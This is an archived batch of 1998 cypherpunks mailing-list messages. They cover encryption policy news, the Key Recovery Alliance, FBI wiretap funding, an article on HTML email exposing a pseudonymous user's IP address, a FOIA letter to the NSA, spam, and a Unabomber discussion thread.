From: "Charles" <bear@gargoyle.apana.org.au>
Date: Thu, 26 Feb 1998 11:27:08 -0800 (PST)
To: David Honig <cypherpunks@toad.com
Subject: Re: From Peter Gutmann  Re: So what *does* happen to a city  wit
In-Reply-To: <3.0.5.32.19980226093420.007dd2d0@otc.net>
Message-ID: <199802261924.FAA25202@gargoyle.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Feb 98 at 9:34, David Honig wrote:

> I wrote: 
> > 
> >>A part of Aukland is finding out.
> >>
> >>http://www.tampabayonline.net/news/news101l.htm
> 
> Peter G replies: 
> >It's pretty serious, so far it's affected (at various times) a number of 

Strangely enough (Auckland is just a 3 hour flight ESE of here) at
almost the same time Aucklands power went down Brisbane in
Queensland Australia had its own power problems from last Sunday
through to approx Thursday. Our situation was nowhere near as bad as
Aucklands but it was unusual. The government claimed that all 4 of
our power stations (insert particular fault of the day...I heard
boilers blowing up, pipes getting clogged etc) had an incredibly
unlucky act of god perpetrated on them all at the exact same time
resulting in controlled blackouts to SE Queensland and Brisbane
(excepting the CBD which was not subject to power rationing). The
minister responible claims that it was not due to lack of
maintenance (which would be my guess) but just a one in a billion
chance. I guess we don't have a national power grid here to draw on
during such times.

If anyone has found out what really happened here I'd love to know as 
the pollies usual lies are getting so bad its embaressing.

-- 
   .////.   .//    Charles Senescall           bear@gargoyle.apana.org.au
 o:::::::::///                                   apache@bear.apana.org.au
>::::::::::\\\     Finger me for PGP PUBKEY            Brisbane AUSTRALIA
   '\\\\\'   \\    Apache




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Fri, 27 Feb 1998 02:57:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: (crosspost)  [IWAR] ANONYMITY HTML risk (fwd)
Message-ID: <Pine.SOL.3.96.980227055541.17123A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
>>From:  <jericho@dimensional.com>
---------- Forwarded message ----------
>From: 7Pillars Partners <partners@sirius.infonex.com>
To: g2i list <g2i@xmission.com>, IWAR list <iwar@sirius.infonex.com>
Date: Thu, 26 Feb 1998 09:30:06 -0800 (PST)
Reply-To: iwar@sirius.infonex.com
Subject: [IWAR] ANONYMITY HTML risk

Two points: military personal should be particularly aware of this problem, and
users with needs for anonymity should be certain to check out the options
provided by the Anonymizer. --MW

Is Web-Based Mail Bad for Your Anonymity?
 by Steve Silberman 

 5:03am 26.Feb.98.PST
 It's the kind of scare story, posted from an
 anonymous address, that makes the rounds of
 computer security mailing lists and newsgroups.
 This time, however, the scenario was so simple as
 to be highly plausible. 

 The post - made last week to the Cypherpunks
 mailing list - began ominously: "I just had my
 online pseudonym outed to my company's VP of
 marketing, with potentially serious internecine
 political consequences." 

 The author explained that, like many people, he
 maintains two separate email addresses: a work
 account, and an alternate account on a remote
 server at the local college. For the latter, the
 author employs a pseudonym. This, he says,
 allows him to speak his mind about political views,
 as well as his disdain for his employer's use of
 unsolicited bulk emailings - spam - without fear of
 reprisal. 

 The author's cover was blown, he said, the day he
 used Netscape Mail on his workstation to fetch a
 message mailed by his company to his account
 on the college server. 

 So where was the leak? 

 Like more and more email programs, Netscape
 Messenger - along with Outlook Express, Eudora
 4.0 and many free Web-based mail services such
 as Hotmail - offers users the ability to send and
 receive not only text messages, but fully-rendered
 Web pages, in all their graphical glory. If a user
 has both Eudora 4.0 and Internet Explorer, for
 instance, Eudora will borrow IE's HMTL-rendering
 capabilities to display Web pages sent in mail
 messages. 

 The mail targeted by the company to the author's
 pseudonymous address was written in HTML, and
 contained a standard image tag. When Netscape
 opened the mail and rendered the page, the tag
 sent a call to the company's Web server to fetch
 the image, which left a tell-tale footprint - the IP
 address of the author's machine - on his
 employer's logs. Busted! 

 As software designers aim for a seamlessly
 integrated desktop - with multiple email accounts,
 the Web, and local file access all a click away -
 the tools you select for everyday tasks are more
 important than ever. 

 "This isn't really a mail security issue," observes
 Eric S. Raymond, author of a remote mail-retrieval
 utility called fetchmail. "Email security is
 nonexistent anyway unless you use a strong
 end-to-end encryption method like PGP, but that
 wouldn't have helped here. The issue was an
 unintended side effect of having an intelligent
 agent read your mail and go off to the Web to get
 a piece of information. If he'd been using a [text
 mail] program like Elm or Pine or Mutt, he wouldn't
 have gotten bitten." 

 Cryptography consultant Bruce Schneier, author of
 E-Mail Security: How to Keep Your Electronic
 Messages Private, points out that exchanging
 text-only messages and exchanging HTML entail
 different levels of information exchange between
 sender and recipient. 

 "HTML is a robust protocol designed to make
 things run smoothly, therefore it passes a lot of
 information behind the scenes. That's why it's
 useful," he says. 

 Reading Web pages with an HTML-enabled mail
 program doesn't leave any more of a trail behind
 you than surfing through a site - but it doesn't
 leave any less of one, either. 

 You may not even know when you're on the Web
 when you read your mail with a Web-enabled
 program. Several online publications - including
 Wired News - are available in email form, via
 options such as Netscape In-Box Direct. The text
 portion of the publication is sent to your in-box,
 but images may be siphoned from a remote server
 when you open the message. Clicking on links
 may take you out on the Web while you still think
 you're reading mail on your own hard drive. 

 For Simson Garfinkel, author of Web Security and
 Commerce, the lessons to be gleaned from this
 incident are not about text vs. HTML mail
 software, but about workplace rights. 

 "This individual was using his computer at work,
 and he thought that because he was reading
 personal mail on another ISP, his computer was
 not subject to his employer's scrutiny. Employees
 have no rights to privacy in this country," Garfinkel
 says. "If you want to maintain a digital
 pseudonym, don't read your personal mail at
 work." 


Ken Williams

/--------------------------[   TATTOOMAN   ]--------------------------\
| ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
| EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
| EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
| WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
| FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
| W3B: http://152.7.11.38/~tattooman/w3board/                         |
| PGP: finger tattooman@152.7.11.38                                   |
\----------------[   http://152.7.11.38/~tattooman/  ]----------------/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eng500 <Eng500@aol.com>
Date: Fri, 6 Mar 1998 14:58:39 -0800 (PST)
Subject: Hoo ha!
Message-ID: <9acb3179.34f6af5d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  Check out the #1 best site on the web! You wont regret it!

http://152.163.233.31/dcja1


or click here!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Feb 1998 04:30:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: NYT on Crypto Smoke
Message-ID: <1.5.4.32.19980227123327.00695284@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, February 27, 1998, p. D1.

   Clinton Continues to Stumble Over the 'E' Word (Encryption)

   By John Markoff

   San Francisco, Feb. 26 -- President Clinton described the
   economic impact of the Internet today in glowing terms to
   an audience of technology investors here, but he failed to
   touch on the issue that increasingly appears to matter most
   to Silicon Valley: the fiery debate over the
   Administration's policy on data scrambling.

   The Clinton Administration has endeared itself to the
   nation's high-technology center by cutting capital gains
   taxes and by calling today for a bill that would bar state
   and local governments from enacting taxes on the Internet
   until 2004. But encryption may prove to be the
   Administration's Achilles' heel in its otherwise friendly
   ties with Silicon Valley.

   The debate over encryption -- which has pitted industry and
   civil liberties groups against law enforcement and
   intelligence agencies -- has sharpened in recent weeks. New
   legislation that would restrict the unlimited use of
   encryption is about to be introduced on Capitol Hill. A
   series of intense behind-the-scenes negotiations over a
   compromise solution between the Clinton Administration and
   a small group of high-technology executives suggests that
   no simple resolution is in sight.

   Encryption policy has become a flash point because it is
   both essential for the growth of Internet commerce and
   vital for the protection of privacy. Techniques that use
   mathematical formulas permit computers to scramble data so
   they cannot be read without access to a special "key,"
   usually a large number that permits a user to unscramble
   the information. Law enforcement officials want to force
   users to put such keys in escrow with independent
   authorities to allow for electronic surveillance in
   criminal investigations.

   President Clinton has told Silicon Valley executives in
   private meetings that he is sympathetic with their
   viewpoint but that he is under great pressure from law
   enforcement and national security officials to put even
   greater controls in place on encryption technology.

   "To us this is really important, but it's just an irritant
   to him," said one Silicon Valley executive who met with the
   President before his speech today and asked not be
   identified further. "His basic message to us was, 'Can we
   get this thing done?' "

   Senators John McCain, Republican of Arizona, and Bob
   Kerrey, Democrat of Nebraska, are circulating a revised
   version of their encryption bill, which includes several
   changes in response to industry and privacy concerns but it
   has so far won few adherents outside of the law-enforcement
   community.

   Critics say the legislation is simply a placeholder for
   future laws that would restrict the use of the technology.

   "Everyone who is looking at the export issue is looking at
   it as a prelude to domestic controls," said Mark Rasch, a
   former Federal prosecutor who is now a specialist in
   encryption and computer security issues at the Science
   Applications International Corporation in McLean, Va.

   Industry opponents of encryption controls, heavily financed
   by high-technology companies, are preparing to announce on
   Wednesday a new coalition, Americans for Privacy, aimed at
   ending restrictions on encryption technology exports.

   At the same time Hewlett Packard plans to announce on
   Friday a new set of encryption technologies, with
   endorsements from the Department of Commerce and companies
   like I.B.M.. These technologies known as the International
   Cryptographic Framework, would let individual governments
   establish potentially conflicting encryption policies -- or
   even place no restrictions.

   Silicon Valley executives argue that the law-enforcement
   demand for the continued ability to wiretap in the
   information age is wishful thinking at best. The easy
   availability of powerful encryption software has made it
   possible for any two people, anywhere in the world to hold
   a secret conversation beyond the prying of even the most
   powerful code-breaking computer, they say.

   The White House is now considering several other industry
   proposals intent on finding a compromise between industry
   and law enforcement interests.

   Another approach that is now being raised in negotiations
   between industry executives and the White House has been
   put forth by executives from Cisco Systems, the company
   that is the dominate provider of Internet routing
   equipment.

   The Cisco proposal, known as Clearzone, would place
   encryption in the network instead of from personal computer
   to personal computer. Then, if a law-enforcement agency had
   a warrant to wiretap, it would be possible to go to an
   Internet provider that could then turn off encryption. But
   this proposal makes no provision for retrieving stored
   information also sought by law-enforcement agents.

   [Photo] President Clinton and Sandy Robertson of
   BancAmerica Robertson Stephens, at a conference of
   technology executives and investors in San Francisco
   yesterday.

   [End]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Feb 1998 05:06:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: KRA Dis-Trust
Message-ID: <1.5.4.32.19980227130857.006a23d8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Register: February 27, 1998 (Volume 63, Number 39)
[Page 10040-10041]
>From the Federal Register Online via GPO Access [wais.access.gpo.gov]

-----------------------------------------------------------------------

DEPARTMENT OF JUSTICE

 
Notice Pursuant to the National Cooperative Research and 
Production Act of 1993; Key Recovery Alliance (``KRA'')

    Notice is hereby given that, on October 20, 1997, pursuant to 
Sec. 6(a) of the National Cooperative Research and Production Act of 
1993, 15 U.S.C. 4301 et seq. (``the Act''), the Key Recovery Alliance 
(``KRA'') has filed written notifications simultaneously with the 
Attorney General and the Federal Trade Commission disclosing (1) The 
identities of the parties and (2) the nature and objectives of the 
venture. The notifications were filed for the purpose of invoking the 
Act's provisions limiting the recovery of antitrust plaintiff's to 
actual damages under specified circumstances. Pursuant to Sec. 6(b) of 
the Act, the identities of the parties are: Apple Computer, Inc., 
Cupertino, CA; Cylink Corporation, Sunnyvale, CA; Data Securities 
International, Inc., San Diego, CA; Digital Equipment Corporation, 
Nashua, NH; Golden Star Technology, Inc.,

[[Page 10041]]

Cerritos, CA; Information Resource Engineering, Inc., Baltimore, MD; 
Intel Corporation, Hillsboro, OR; International Business Machines, 
Inc., Somers, NY; Motorola, Scottsdale, AZ; NCR, West Columbia, SC; 
Novell Inc., Provo, UT; Sourcefile, Atlanta, GA; Sun Microsystems, 
Inc., Mountain View, CA; Trusted Information Systems, Inc., McLean, VA.

    KRA was formed for the following purposes: (a) Stimulate global 
electronic commerce by encouraging the harmonization of market driven 
solutions available globally for secure communication using strong 
encryption; (b) serve as a focal point for industry efforts to develop 
commercially acceptable solutions for recovery of encrypted 
information; (c) determine interoperability concerns and potential 
architectural solutions among key recovery technologies and non-key 
recovery technologies; (d) support the development of a global 
infrastructure that supports recovery of encrypted information and (e) 
promote the implementation, deployment and use of interoperable key 
recovery technologies in the market. In furtherance of the foregoing 
purposes, KRA may undertake research, development, analysis, testing, 
study, and experimentation concerning or relating to key recovery 
technologies, and it may engage in the collection, exchange and 
analysis of research information concerning key recovery technologies.

    Additional parties may become members of KRA. KRA will file 
supplemental written notifications disclosing all new members.

Constance K. Robinson,
Director of Operations, Antitrust Division.
[FR Doc. 98-5014 Filed 2-26-98; 8:45 am]
BILLING CODE 4410-11-M







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 67471470@30410.com
Date: Tue, 3 Mar 1998 00:33:26 -0800 (PST)
To: Friend@public.com
Subject: LOWER YOUR CHILD SUPPORT!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
LOWER YOUR CHILD SUPPORT!!!

Don't be a DEADBEAT DAD!!!

Join the FATHERS' RIGHTS COALITION and learn how to legally reduce
your court-ordered child support WITHOUT AN ATTORNEY.Millions of FATHERS 
have been unjustly labeled as DEADBEAT DADS because they cannot afford 
to pay their child support due to factors beyond their control such as unemployment,
under employment, and unforeseen or unexpected expenses.

Most fathers are treated unfairly by the courts because they cannot afford the expense
of an attorney.  Even worse, fathers that employ an attorney to assist them in trying to 
obtain a child support reduction end up having to explain to the court why they can
pay an attorney and not pay child support. 

Failure to fully pay your child support can cause you to lose your drivers, business or
professional license.  As well, owing child support can ruin your credit rating and 
prevent you from obtaining employment.  Your failure to pay all of your child support 
can cause you to be jailed or imprisoned. Ignorance or inaction could totally ruin your life!

For only $49.90 you can join the FATHERS' RIGHTS COALITION and receive with
your membership the publication entitled REDUCE YOUR CHILD SUPPORT
WITHOUT AN ATTORNEY.

REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY is an easy-to-read publication
which could instruct you as to the law and procedure required to obtain your right to a reduction 
from your present child support order.  As well, this publication will inform you on how to dispute 
and/or reduce past child support arrearages, interest and penalties.

As a member, you can also receive information on low-cost paralegal services which can assist 
you in preparation of the court forms necessary to reduce your child support..  

As a member, you will receive the FATHERS' RIGHTS COALITION NEWSLETTER.  
This newsletter contains information about recent changes in the child support laws and tips 
on presenting your case in court.As a member, you will be making a statement to the politicians 
that you're tired of being abused by the law and the courts.

Most importantly, as a member you can educate yourself in the court process and 
obtain your rights to due process and a fair child support order.

One of our members (who had only a high school education) was able to obtain a child support
order of $.00 dollars (zero) for over eighteen (18) months. (Superior Court of the State of California,
County of Siskiyou, Coonrod v. Coonrod, Case No. 35594)

TO JOIN fill in the application and mail to the address
with your one-time membership fee of $49.90.  
(Allow 2-4 weeks for delivery of REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY)


Send the completed application with $49.90, one-time membership fee ,to:


				FATHERS RIGHTS COALITION
				702 Mangrove Ave.,  Suite 134
				Chico,  CA 95926


----------------------------------------------------------------------------------------------------- 

YES, I want to join the  FATHERS' RIGHTS COALITION.  I have enclosed $49.90 for the lifetime membership.  
Upon receipt of my application and membership, send me REDUCE YOUR CHILD SUPPORT WITHOUT AN ATTORNEY..
                               
                               E-Mail Address _________________
                                                                                                                                 002
		
                                Name______________________________________

 		Address______________________________________

		City__________________ State ________  Zip 	_________




</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 27 Feb 1998 09:30:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: FBI national wiretap stalled for $$
Message-ID: <3.0.5.32.19980227092656.007ed320@otc.net>
MIME-Version: 1.0
Content-Type: text/plain




The telcos don't want to be stuck for the > $500,000,000 cost of installing
the national
surveillience infrastructure.



http://www.newsday.com/ap/rnmpwh19.htm

	
Reno: Impasse on Digital Wiretaps

                     WASHINGTON (AP) -- Attorney General Janet Reno says an
``impasse'' between the government and telephone companies
                     is delaying installation of new technology that would
enable the FBI and other law enforcement agencies to wiretap into new
                     digital phone lines.

                     Under a 1994 law the government was to pay the phone
companies up to $500 million to develop new computer codes and
                     switches and have them installed by next October.

                     The effort, however, was delayed for at least two
years while the FBI and the phone companies battled with each other over
                     the extent of how much wiretapping capability would be
provided.

                     Testifying Thursday before a House appropriations
subcommittee, Reno conceded that meeting law enforcement's future needs
                     will likely cost the phone companies more than $500
million. She said the phone companies have balked at moving forward
                     unless the government agrees to reimburse their costs
above that amount.

                     ``We may be at an impasse,'' she said. ``Simply said,
industry's proposal is that all equipment, services and facilities
installed or
                     deployed as of October 1998 would be deemed in
compliance forever ... unless the government agrees to pay to modify or to
                     upgrade it.''

                     Reno said the Justice Department likely will file a
petition with the Federal Communications Commission next month ``stating
                     that the proposed industry technical solution is
deficient'' and asking the agency to make the phone companies meet law
                     enforcement needs.

                     She said the FBI's electronic surveillance is already
being hampered because of the impasse. But given the six months that the
                     FCC says it would need to decide the case and another
18 months required to install the necessary software and switches,
                     Reno said it may be two years before police agencies'
wiretapping capability fully is restored.

                     Meanwhile, the Justice Department has asked for
another $100 million in next year's budget to reimburse the phone companies.

                     The subcommittee's chairman, Rep. Harold Rogers,
R-Ky., told Reno to not expect any more money until the dispute is
                     resolved.

                     ``I not only hope that it's going to happen; I'm going
to make it happen,'' he said, ``or you won't get any money. I don't know
                     how more bluntly I can put it. You dragged your feet
for three years ..., the industry has dragged their feet. I think it's a
plague
                     on both your houses.''

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

 The Internet Protocol's only guarantee is that your packets will not clog
the network.






	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gartner Interactive <interactive.services@gartner.com>
Date: Fri, 27 Feb 1998 07:13:05 -0800 (PST)
To: Gartner Interactive Users <interactive.users@gartner.com>
Subject: New enhancements introduced today!
Message-ID: <199802271512.HAA21801@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Gartner Interactive User,

We are excited to announce significant enhancements to Gartner
Interactive (http://www.gartner.com).  We have updated Gartner
Interactive to provide more convenient and easy access to your
GartnerGroup research, whether it is from GartnerAnalytics/Research
and Advisory Services, Dataquest, GartnerMeasurement or from an
@vantage Content Partner.

We continue to leverage technology to provide you with the
simplest and fastest way to access your GartnerGroup research.

KEY ENHANCEMENTS INCLUDE:

*Home Page (http://www.gartner.com) - We have redesigned the Home
Page to provide more convenient access to the areas on Gartner
Interactive that are important to you.

*Client Access page
(http://www.gartner.com/public/static/home/clientaccess.html) - Our
redesign makes it easier to access your research and adds useful
information about your relationship with GartnerGroup.  You should
use the Client Access page as your gateway to Gartner Interactive.

*Profiling (http://www.gartner.com/ggbin/profile/personalpage) - With
profiling you may receive automatic e-mail notification of documents
that match the subjects you are interested in.  We have updated
profiling so that profile results are limited to only the documents
to which you already have access.  By default we are excluding
documents that are purchasable online, although you may easily change
your profile to include these documents.  If you haven't already, you
may establish a profile by going to "My Home Page."
(http://www.gartner.com/ggbin/profile/personalpage)
PLEASE NOTE:  If you have already set up a profile and want to
include the titles and summaries of documents to which you do not
have full access, please update your profile by going to the Profile
Management Menu (http://www.gartner.com/ggbin/profile/profmain.pl).

*Search (http://www.gartner.com/ggbin/ggquery) - When searching, the
words you have searched for are automatically highlighted in red and
bolded wherever they appear in a document.  This makes it easy to
scroll through a document and find the words you searched for.

*Purchasable documents - In search, browse and profile results
lists, the documents you do not already have access to are now
excluded by default.  To include them, simply select "Yes" where you
are asked "Do you want to include documents available for purchase
or license in your results?"  Documents you do not have access to
and documents that are available for purchase are now clearly
identified with a $ icon.

*Shop our Store on Gartner Interactive
(http://www.gartner.com/public/static/store/gartnerstore.html) - The
Store provides you with one place to find important and noteworthy
research from GartnerGroup and the @vantage Content Partners that is
available for credit card purchase.

*GartnerGroup Events
(http://www.gartner.com/public/static/events/main.html) - We have
updated this section to provide you with better access to
information on GartnerGroup's events.  You may also register
online for events.  Soon you will be able to keep up-to-date on
future events with our Events e-mail list.

*Leaders OnLine
(http://www.gartner.com/gg/static/leaders/leaders_home.html) - Join
the debate currently underway with Bill Kirwin, GartnerGroup
analyst, and our leaders on Total Cost of Ownership (TCO).
Additional forums will be introduced soon.

*Coming soon on Gartner Interactive:
-Gartner Live
(http://www.gartner.com/public/static/store/gartnerlive.html) will
be broadcasting from GartnerGroup's Predicts, Remote Access, and
Internet and Electronic Commerce conferences.  Stay tuned for more
information.

We have made these changes based on feedback from our clients.
Please tell us what you like and what needs improvement using the
"feedback" link located at the bottom of every page on Gartner
Interactive.

If you would like more information on these changes, please visit
our "About this site" section for additional details.

Best Regards,

Drew Seath
SVP, Interactive Services
Gartner Group, Inc.
==============================================================

To have yourself removed from our updates mailing list, please
send an e-mail to mailto:unsubscribe.updates@gartner.com.

If you have more questions, you may contact us at:
mailto:help@gartner.com.  If you prefer to talk to someone live,
please call the Interactive Services Hotline in the United
States at +1-203-316-3600 or the European Support Centre at one
of the free-of-charge numbers listed below:

Austria:         0660-5815
Belgium:         0800-15171
Denmark:         80-01-87-79
Eire:            1-800-409-139
Finland:         0800-118045
France:          0800-90-8506
Germany:         0130-8142-64
Italy:           1678-76002
Luxembourg:      0800 2886
Netherlands:     06-022-1336
Norway:          800 1 1018
Sweden:         020 795266
Switzerland:     0800-55-8252
United Kingdom:  0800 716089

==============================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 27 Feb 1998 10:57:14 -0800 (PST)
To: ray kammer <" kammer"@nist.gov>
Subject: cyber FOIA/settlement e-mail
Message-ID: <34F70889.508F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Friday February 27, 1998 11:18 AM

By e-mail and US mail

Lieutenant General Kenneth A Minihan, USAF
Director, National Security Agency
National Security Agency
9800 Savage Road
Fort George G. Meade, MD 20755-6000

Dear General Minihan:

Purposes of the letter are to

1  request information under the Freedom of Information Act
2  explore settlement possibilities of our current lawsuit.

In about 1986 Sandia National Laboratories assigned me the 
task of  design and construction of a Comprehensive Test Ban 
Treaty seismic data authenticator.

In the initial stages of the project, Sandia cryptographer 
Gustavus Simmons attempted to convince both Sandia 
management and NSA employees Tom White, Mark Unkenholtz,
and Ed Georgio that a form of public key authentication should 
replace NSA employee Ronald Benincasa's National Seismic
Station/Unmaned Seismic Observatory 11-bit data authentication
algorithm.

My Sandia supervisor John Holovka and project leader H B [Jim]
Durham ordered me to write a paper explaining public key 
cryptography.

This paper,  RSA ENCRYPTION, along with my SAND report
describing my implementation of Benincasa's algorithm and
filings in our lawsuit, now appear on Internet at
http://www.jya.com/index.htm, click CRYPTOME, then OpEd,
then http://www.jya.com/whprsa.htm.

Sandia explored the merits of switching from Benincasa's
algorithm to a public key-based authentication method suggested
by Simmons.

For Sandia's evaluation of the merits of public key, electronic tagging,
and Bureau of Engraving and Printing projects ,  I bought for Sandia 
samples both the Cylink CY1024 and AT&T A & B two chip sets for
modulo m arithmetic computations.

NSA employee Tom White sent me a copy of the SECRET classified
NSA report on IBM's hardware public key chip FIREFLY.

I wrote in my tutorial paper

  RSA hardware computations

  The slow speed of software RSA computations plus the potential
  wide use prompted several companies to build chips which compute
  modular arithmetic to at least several hundred bits.  Most of
  these chips "cascade" to compute with a larger number of bits.

  Corporations involved in building these chips are

     1  IBM  Firefly

     2  AT&T

     3  Motorola (apparently a three chip set)

     4  Cylink   Pittway-First alert

     5  Sandia Labs (Algorithm M and predecessor chip)

  Details of the IBM chip is classified.  AT&T as of July 1987 has
  not released details of their chip.  Little information is
  available on the Motorola chip set.

  The Cylink chip is commercially available.  Its price dropped
  from $1,500 to $600 each in June 1987.  Data is transferred to
  and from the chip with serial shift register communication.

  The early Sandia chip was limited in speed.  The replacement
  chip is cascadeable, communicates with 8 or 16 bits parallel,
  matches the speed of the Cylink chip, but is not out of
  fabrication.

  Rumors circulate that there is about an order of magnitude
  performance difference between some of these chips.

  These hardware chips improve exponentiation speed about 3 orders
  of magnitude over software implementation benchmarked on an Intel
  8086 family microcomputer.

Whitfield Diffie writes about both the Cylink and Sandia chips.  And
is quoted at  http://www.aci.net/kalliste/nukearse.htm.

Sandia had terrible luck with its public key chips.  

I reported SOME of the troubles to Electronic Engineering Times editor
Loring Wirbel [http://techweb.cmp.com/eet/823/] on March 23, 1994.

        Dr. John Wisniewski was a supervisor at Sandia's Center for
        Radiation-hardened Microelectronics.  Wisniewski was a graduate
        student at Washington State University in about 1975.  I was a
        professor at WSU.

        Wisniewski knows all about the failing Sandia chips in the
nuclear
        arsenal.  I took notes on February 13, 1993.  Wisniewski
reviewed
        the problems again for me.

             1    No quality initiative.  Each chip lot had a different
                  process.
             2    Overall yield - 40-50%.  Down to 10% after packaging.
             3    Metalization problems.  No planarization.  No flow of
                  glass.  Couldn't use high temperature.  Step coverage
                  problems.  Layed down over tension.  100% field
returns
                  over several years.
             4    Sandia would store lots of parts for replacements.

        Sandia management made the decision to place low yield parts in
        the nuclear arsenal.  Sandia must meet DOD schedules management
        reasoned.  Hundreds of millions spent on CRM.  Sandia must show
        productivity.

        Wisniewski told me that low yield chip test survivors are those
which
        the tests failed to detect failures.  Wisniewski will talk. 
503-625-
        6408.  Wisniewski now works for Intel in Oregon.  Have
Wisniewski
        tell you about the fire in the CRM clean room!

Sandia supervisor Jerry Allen later told me it cost $300,000 each to
remove
Sandia's failing chips at Pantex from a nuclear bomb.

NSA apparently is biased toward hardware implementations of
cryptographic
and authentication algorithms.  As opposed to software implementation.

NSA representatives and Sandia management decided not to use a public
key authentication scheme for its CTBT seismic data authenticator
because
of all of the problems with implementing public key algorithms.

But NSA surely has spent MUCH MONEY on public key chip implementations.

NSA is promoting its Clipper crypto chips as described at
http://cpsr.org/dox/clipper.html.

And we get some information about technical specifications of NSA's
Clipper
chip at http://www.us.net/softwar/http://www.us.net/softwar/clip.html

  Clipper Chip Information

  MYK-78 CLIPPER CHIP ENCRYPTION/DECRYPTION  ON A CHIP 

     1 micron double level metal CMOS technology 
     0.35 watts power 
     28 pin plastic leaded chip carrier (PLCC) package 
     Transistor to transistor logic (TTL) interface 
     Chip ID, family key and device unique key are installed at
programming. 
     Chip ID, family key and device unique key are installed at
programming           facility and are completely transparent to the
user.

Therefore, Under the provision of the Freedom of Information Act, 
5 USC 552, I am requesting access to: 

1  Copies of all invoices from

	A   AT&T
	B   Motorola
	C   IBM
	D  Sandia National Laboratories

to NSA for payments for developing ANY public key-related chips between
January 1, 1980 and February 27, 1998.

2  Copies of all invoices to NSA from ANY corporation involved in
development
of ANY Clipper chip-related hardware between January 1, 1980 and 
February 27, 1998.

The public has a right to know how much NSA spent on TRYING monoploize
the crypto
business.

If there are any fees for searching for, or copying, the records I have 
requested, please inform me before you fill the request.

As you know, the Act permits you to reduce or waive the fees when the 
release of the information is considered as "primarily benefiting the
public."  
I believe that this requests fits that category and I therefore ask that
you waive 
any fees.

If all or any part of this request is denied, please cite the specific
exemption(s) 
which you think justifies your refusal to release the information and
inform 
me of your agency's administrative appeal procedures available to me
under the law.

I would appreciate your handling this request as quickly as possible,
and I look 
forward to hearing from you within 20 working days, as the law
stipulates.

With respect to our current FOIA lawsuit, I feel that we should settle
this
unfortunate matter.

I see from your biography at  http://www.nsa.gov:8080/ and
http://www.nsa.gov:8080/dirnsa/dirnsa.html that you are

         1979   Distinguished Graduate
         Master of Arts degree in National Security Affairs 
         Naval Postgraduate School 
         Monterey, California

One of my former M.S. and Ph.D students in Computer Science,
Ted Lewis, is currently the chairman of Computer Science at
Naval Postgraduate School [http://www.friction-free-economy.com/].

Small world.

But I think that this emphasizes that WE SHOULD all be on the same side.
Not engaged in a conflict in US federal court.  Or on Internet.

NSA attempts to withhold requested information are possibly unwise.  

In our wired world the aggrieved know what happened to them.
http://www.wpiran.org/,http://www.netlink.co.uk/users/impact/namir/namirm.html

And moderates in Iran, http://persia.org/khatami/biography.html, appear
want
settlement too.

My family and I have been damaged by these crypto wars.

I ask you that consider fair settlement of damages caused by the
National
Security Agency.

I cannot find your e-mail address on Internet.

Therefore I will forward the e-mail copy of this FOIA/settlement letter
to 
Ray Kammer of NIST [http://www.nist.gov/], who along with the FBI 
[http://www.fbi.gov/, http://www.fbi.gov/fo/nyfo/nytwa.htmand], and NSA 
are trying to control the crypto business so that Kammer can possibly
forward an e-mail copy of the FOIA/Settlement letter to you.

Sincerely,

bill

William Payne
13015 Calle de Sandias
Albuquerque, NM 87111
505-292-7037 [I am not reading e-mail]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 27 Feb 1998 14:20:41 -0800 (PST)
To: Information Security <cypherpunks@toad.com
Subject: Re: Killing the Unabomber
In-Reply-To: <199802250642.BAA03918@panix2.panix.com>
Message-ID: <3.0.5.32.19980227124515.008aa420@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   >   : Didn't the government finally back down on their
>   >   : attempt to legally kill the Unabomber?  
>   >   This point strikes me as pretty funny.  Kinda like a nurse rooting
>   >   for Charles Starkweather.

>Or trying to be consistent.
>Raygun: abortion is killing, but pro-death penalty.
>If killing is wrong, killing again is wrong.

No consistency involved - many of them would like to kill him.
But they've Got Their Man, and he's made it clear that a trial
will be difficult, long, expensive, involve lots of firing lawyers
and arguing about mental competency, and generally be trouble,
and he's offered to plead guilty if they won't kill him.

Even though he's a highly intelligent cold-blooded killer,
he's also close enough to crazy that the public will have
enough sympathy for him that killing him won't be highly popular,
especially because his brother wouldn't have turned him in
if he'd expected him to be killed.

